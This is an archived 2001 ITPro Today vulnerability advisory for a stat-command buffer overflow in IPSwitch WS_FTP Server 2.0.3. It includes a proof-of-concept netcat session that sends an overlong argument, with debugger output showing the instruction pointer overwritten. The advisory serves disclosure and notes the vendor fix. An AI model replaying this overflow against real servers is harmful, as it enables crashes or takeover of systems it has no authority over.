Unchecked Buffer in IPSwitch WS_FTP

A vulnerability exists in IPSwitch’s WS_FTP Server 2.0.3 that lets a potential remote attacker gain system-level access to servers running the FTP daemon.

Ken Pfeil

November 5, 2001

3 Min Read
ITPro Today logo in a gray background | ITPro Today

Reported November 5, 2001, by DefcomLabs.

VERSION AFFECTED

  • IPSwitch WS_FTP FTP Server 2.0.3 for Windows XP, Windows 2000, and Windows NT

 

DESCRIPTION
Avulnerability exists in IPSwitch’s WS_FTP Server 2.0.3 that lets a potentialremote attacker gain system-level access to servers running the FTP daemon. Thisvulnerability results from buffer overrun condition in the parsing code used toprocess the stat command. Sending a stat command to the vulnerable server withan argument greater than 479 bytes triggers the overflow.

DEMONSTRATION

Defcom Labs provided the following demonstration asproof-of-concept:

 

 

  C:toolsweb>nc localhost 21

  220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)

  220-Wed Aug 08 19:57:40 2001

  220-30 days remaining on evaluation.

  220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)

  user ftp

  331 Password required

  pass ftp

  230 user logged in

  stat  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAA

 

  0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to127.0.0.1:21

  SetFolder = C:programiFtpSvchelig

  SetFolder = C:programiFtpSvcheligpublic

  SetFolder = C:/program/iFtpSvc/helig

  0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logonsuccess

  (A1)

  Access violation - code c0000005 (first chance)

  eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002

  esi=0067c280 edi=00130178

  eip=41414141 esp=0104ded4 ebp=41414141 iopl=0

  41414141 ??              ???

 

VENDOR RESPONSE

Thevendor, IPSwitch, released version2.0.4 to correct this vulnerability.

 

CREDIT
Discovered by AndreasJunestam and Janne Sarendal ofDefcom Labs.

About the Author

Ken Pfeil

Ken Pfeil

See more from Ken Pfeil
Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.
Newsletter Sign-Up

You May Also Like

Editor's Choice

a gavel at the center of a maze
Regulatory Compliance
Guide To Navigating the Legal Perils After a Cyber IncidentGuide To Navigating the Legal Perils After a Cyber Incident
byIan Horowitz
Sep 20, 2024
7 Min Read
4 different colored figures standing on different sized piles of coins
IT Management
6 Decades After Civil Rights Act, Racial Pay Gap in IT Persists6 Decades After Civil Rights Act, Racial Pay Gap in IT Persists
byJoe Milan
Sep 19, 2024
9 Min Read
skills dial
IT Operations
ERP Skills Outpace AI in 2024 as Demand for IT Strategy SoarsERP Skills Outpace AI in 2024 as Demand for IT Strategy Soars
byNathan Eddy
Sep 23, 2024
7 Min Read
Exclusive ITPro Resources
See all ITPro Resources

Featured How Tos

Linux written on top of code
Linux OS
How to Set Up a Separate /home Partition on LinuxHow to Set Up a Separate /home Partition on Linux
screenshots of PowerShell code fly off of a laptop screen
PowerShell
PowerShell Screen Captures: How To Automate Screenshots in Your ScriptsPowerShell Screen Captures: How To Automate Screenshots in Your Scripts
tablet with "cloud computing" on the screen on top of financial documents and calculator
Cloud Computing
Guide to Cloud Computing ETFsGuide to Cloud Computing ETFs
Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.
Newsletter Sign-Up
Trending

Recent What Is

list of domains within the umbrella category of IT security
IT Security
What Is IT Security? Essentials of IT Security ExplainedWhat Is IT Security? Essentials of IT Security Explained
ITPro Today's tech careers quick reference guide cover
Career Management
Tech Careers: Quick Reference Guide to IT Job TitlesTech Careers: Quick Reference Guide to IT Job Titles